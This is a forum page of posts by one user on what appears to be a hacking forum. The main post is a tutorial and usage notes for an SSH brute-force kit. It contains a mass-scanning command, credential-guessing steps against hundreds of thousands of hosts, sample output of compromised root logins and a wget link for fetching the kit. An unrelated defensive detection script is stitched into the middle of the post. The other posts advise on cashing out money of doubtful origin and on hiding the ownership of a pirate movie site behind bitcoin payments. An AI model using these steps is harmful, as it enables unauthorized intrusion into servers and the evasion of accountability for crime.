
Eric

Active Members
  • Posts: 539
  • Days Won: 4

Posts posted by Eric

  1. INFO:

     

    Quote

    1. ssh2banner is for retrieving the banner of the ssh server. The good thing is that you don't even need u/p, thus making this a very good tool for determining if it is a proper ssh server
            INPUT FILE = `i`
            1.2.3.4
            3.3.3.3
            4.4.4.4

            OUTPUT
            1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu
            3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2
            4.4.4.4:22:SSH-WHATEVER_BANNER

            EXAMPLE RUN
            ./ssh2banner <FORKS> <PORT> <TIMEOUT> <VIPCODE>

    2. bssh2z (brute ssh) is for brute-forcing a list of ips with various passwords
            INPUT FILE (list of ips) = `i`
            1.2.3.4
            3.3.3.3
            4.4.4.4

            INPUT FILE (list of user/pass combo) = `p`
            root $BLANKPASS
            admin admin
            user pass

            OUTPUT
            `n` -> nobash,busybox,honeypot,other linux
            root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5

            `v` -> vuln,virtual,good linux
            root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
            user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
            root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
            root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
            root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

            EXAMPLE RUN
            ./bssh2z <FORKS> <PORT> <TIMEOUT> <VIPCODE>

            If you put like 20 ips and 400 passwords and the scan works slow, don't worry, it is a fail2ban protection. It is pointless to finish them in 1 minute, thus you will get banned after the first 5 tries in less than a minute. It will finish it, have patience.


    3. ssh2check (checker ssh) is for re-checking your existing N or V file from bssh2z to know what servers are still online
            INPUT FILE (list of ips) = `list.txt`
            root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
            user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
            root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
            root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
            root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln


            OUTPUT
            `others.txt` -> nobash,busybox,honeypot,other linux
            root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5

            `servers.txt` -> vuln,virtual,good linux
            root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
            user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
            root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
            root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
            root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

            EXAMPLE RUN
            ./ssh2check <FORKS> <PORT> <TIMEOUT> <VIPCODE>
     

     

     

    Tutorial:

    Quote

    This is a tutorial that will teach you to efficiently scan SSH servers real fast.

    #HoneyPot banners     -> SSH-2.0-Twisted and more
    #Honeypot Ram or CPU  -> Ram: "7880 7690 189 0 400 5171" ; CPU: "Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz", some  "QEMU Virtual CPU version 1.7.0" but not all
    #Good servers banners -> "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2", "SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6", "SSH-2.0-OpenSSH_6.6.1" and more, all OpenSSH is possibly good
    #Nobash banners       -> "SSH-2.0-dropbear", "SSH-2.0-IPSSH-1.10.0", "SSH-2.0-XXXX", "SSH-2.0-Parks", "SSH-2.0-ROSSSH", "SSH-1.99-Cisco-1.25" and more
    #Shitty banners       -> "SSH-2.0-RomSShell_4.62", "SSH-1.99-cryptlib", "", and more
    #Info: Only for uid0
    ########################################

    password=unlimited
    port=22
    timeout=15
    threads=500
    ssSpeed=10
    masscan_speed=20000

    #########################################

    rm -rf input.txt bios.txt i

    ./masscan $1 -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8  -sS -Pn -n --randomize-hosts -v --send-eth
    ./ss $port -a $1 -s $ssSpeed

    So we have the bios.txt that contains a list of ips that have port 22 open; it is time to put it to the check with ssh2banner.

    (banner ssh will read `i` file, also shuffling ips)
            cat bios.txt | sort -u | shuf > i
            ./ssh2banner 150 22 10 YOUR_VIPCODE_PASSWORD;

    We will use 150 forks (max ssh connections at a time), but you can put whatever number you want (500, 1000); be careful to not get your server banned or in ram/cpu load.

    The ssh2banner is way faster than the bssh2z (brute-ssh) because it is just connecting to the server and getting the ssh-banner only, without username/password. It will generate a `banners.log` file that will contain data like this :
            1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu
            3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2
            4.4.4.4:22:SSH-WHATEVER_BANNER

    You will see a lot of banners, starting from OpenSSH to dropbear or some that you even heard about, like routers and other stuff. This list is perfect to do a brute-SSH attack on it, thus you are 100% sure that those are servers and not some other applications that are opened on port 22.

    Retrieve just the ips from this list with this command :

            rm i;
            cat banners.log | cut -f ":" -f 1 > i;

            if you wish you can scan only dropbear
            cat banners.log | grep "dropbear" | cut -f ":" -f 1 > i;

            or cisco routers
            cat banners.log | grep "cisco" | cut -f ":" -f 1 > i;

    Create a nice password file `p` beginning with the user/pass combo "root $BLANKPASS", should look like this :
            root $BLANKPASS
            admin admin
            username password
            ...

    then do a
            wc -l i p
             233214 i
                     18 p
             233232 total
            Looks ok

    Now we will do a brute-SSH attack on those using this command
            ./bssh2z 150 22 10 YOUR_VIPCODE_PASSWORD;

    You will see something like this going on:

            Current version : 2.5.1
            Last version : 2.4.1
            Counting PASS
            Counted [18] PASS
            Counting IPS
            Counted [233214] IPS
            There are [4197852] possible combinations
            Starting session 0
            Trying user/pass combo #1->[guest][]
            Combo [9 of 4197852] -> [178.27.29.115] with [guest][]
            Combo [4 of 4197852] -> [220.128.68.129] with [guest][]
            ...

            Duplicate NOBASH [128.54.202.72]
            Duplicate NOBASH [37.48.86.100]
            Combo [53262 of 4197852] -> [67.221.173.53] with [guest][]
            ....

    You will see the checking process begin and from time to time check your `n`(non-bash servers) and `v`(good/vuln servers) files, should look like this :

            N
            root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51

            V
            root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
            user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
            root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln

            root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
            root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

    And there you go. More than that, from time to time you can recheck them to see what servers are still online with ssh2check (checker-ssh)

            cat n v > list.txt;
            ./ssh2check 150 22 10 YOUR_VIPCODE_PASSWORD;

            it will output 2 files
            `others.txt` -> nobash,busybox,honeypot,other linux
            root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
            root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5

            `servers.txt` -> vuln,virtual,good linux
            root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
            user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
            root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
            root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
            root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln

    Happy scanning.
     

     

    Download link: wget http://i9x0.com/bssh2z-full.tar; tar xvf bssh2z-full.tar; cd bssh2z-full; cat info.txt ; cat tutorial.txt

     

    • Upvote 5
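
Added example (not part of the original post or of the tool it describes): the run log above tries one user/pass combo against every IP before moving to the next, so each host sees only a few failures and a per-host threshold like the fail2ban one mentioned in the post can stay silent. Aggregating sshd failures across hosts exposes the sweep; the log lines, host names and thresholds below are constructed assumptions, and the input is assumed to be one time window.

```python
import re
from collections import defaultdict

# Constructed sample: sshd syslog lines gathered from three hosts (not real traffic).
SAMPLE = """\
Mar  3 10:00:01 web1 sshd[811]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  3 10:00:02 db1 sshd[402]: Failed password for root from 203.0.113.7 port 40120 ssh2
Mar  3 10:00:03 mail1 sshd[377]: Failed password for root from 203.0.113.7 port 40131 ssh2
Mar  3 10:04:10 web1 sshd[812]: Failed password for invalid user admin from 203.0.113.7 port 40140 ssh2
Mar  3 10:04:11 db1 sshd[403]: Failed password for invalid user admin from 203.0.113.7 port 40151 ssh2
Mar  3 10:04:12 mail1 sshd[378]: Failed password for invalid user admin from 203.0.113.7 port 40166 ssh2
Mar  3 10:05:00 web1 sshd[820]: Failed password for alice from 198.51.100.9 port 51000 ssh2
Mar  3 10:05:09 web1 sshd[821]: Accepted password for alice from 198.51.100.9 port 51002 ssh2
"""

FAILED = re.compile(
    r"^\w{3}\s+\d+ [\d:]+ (?P<host>\S+) sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def find_sprayers(log_text, per_host_limit=5, fleet_limit=5, min_hosts=3):
    """Return sources that stay under per_host_limit on every single host
    yet reach fleet_limit failures spread over at least min_hosts hosts."""
    per_host = defaultdict(lambda: defaultdict(int))  # src -> host -> failures
    users = defaultdict(set)                          # src -> usernames tried
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            per_host[m["src"]][m["host"]] += 1
            users[m["src"]].add(m["user"])
    findings = []
    for src, hosts in sorted(per_host.items()):
        total = sum(hosts.values())
        worst = max(hosts.values())
        # Invisible to a per-host counter, obvious once hosts are combined.
        if worst < per_host_limit and total >= fleet_limit and len(hosts) >= min_hosts:
            findings.append({"src": src, "hosts": len(hosts), "failures": total,
                             "max_on_one_host": worst, "users": sorted(users[src])})
    return findings

if __name__ == "__main__":
    for finding in find_sprayers(SAMPLE):
        print(finding)
```
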
  2. Typically Romanian. All the starving charlatans who look for company on Romanian forums, is there any point in taking you into account?

    excuse me, but what did you expect when you said that THE AUCTION STARTS AT $1?

    if the auction starts at $1, that means this is the minimum amount you want. as far as I know, that is how bidding works at auctions: you start from the minimum amount and go up until only one bidder remains.

    edit: when you put a product up for auction, you may be surprised not to sell it for as much as you expected. before organizing an auction, did you at least look into what the basic rules are?

    don't be upset with me, but explain to me what you understand by an auction.

    I offer $4

  3. but why not take your money out directly, like, you make an account on Hipay - Mobile Payments as if you were selling something via SMS, and an amount of money comes directly to you ;) now it also depends on how many SMS you can send ...etc

    if the credit is stolen or was bought through various un-Christian methods, they will block his money; besides, these people ask for documents, and as a private individual it is harder to get hold of an API for SMS.

  4. Improving security solutions is not an excuse for being too lazy to do research, because, compared to 2004, 2008, or even 2013, there are many more tools available to everyone for launching violent attacks, with much higher chances of success than in previous years.

    It's no use if these tools are not all integrated into a single ./start.

    It's not what it used to be, even the laws have changed and most likely people don't have the balls anymore, they have all become pussies, and the young ones don't have a mentor to teach them or show them various things, to change their mentality, to shape them; they are all set on stealing, scamming, or want to make money. Everyone is looking for ways to monetize; there are few who still do, out of passion, the things that were done years ago without thinking about money. Why should they launch violent attacks and risk hard years when they can sit quietly, not giving a damn, earning 1000e / month from a site dedicated to online movies or working as freelancers for next to nothing?

  5. It's simple. As long as you don't have video sources on the host or force people to pay, nobody will do anything to you. They can block your .ro domain, but another one can be made and in 1 hour at most you are online again.

    I don't want to seem indiscreet, but do you pay for .ro domains online or by bank transfer under your name? if so, don't judge me, but it's foolish, and I'll tell you why: piracy is punished and it's easy to get to you; personally, if I made an online movie site I'd make it on .com, a domain bought with btc. I don't know if it's ok for your name to show up in whois and for these people to knock on your door.

    ps: I don't want to judge you, I'm just trying to give you advice. anyway, you've cleared some things up for me. thank you for taking the time to explain, in a way everyone can understand, what happens behind an online movie site.

  6. @GarryOne Thank you very much!

    Don't worry about the amount anymore, because every leu is very welcome.

    It's not the cancer that scares me most, but the lack of money to fight it.

    I'm a sensitive person and I couldn't bear the thought that my father died because I didn't have money to get him what he needs.

    a btc address would be much better for donations, and right here on the forum you can convert them to cash (spooky has a thread on rstmarket); you can talk to him, maybe he'll lower his commission for you.
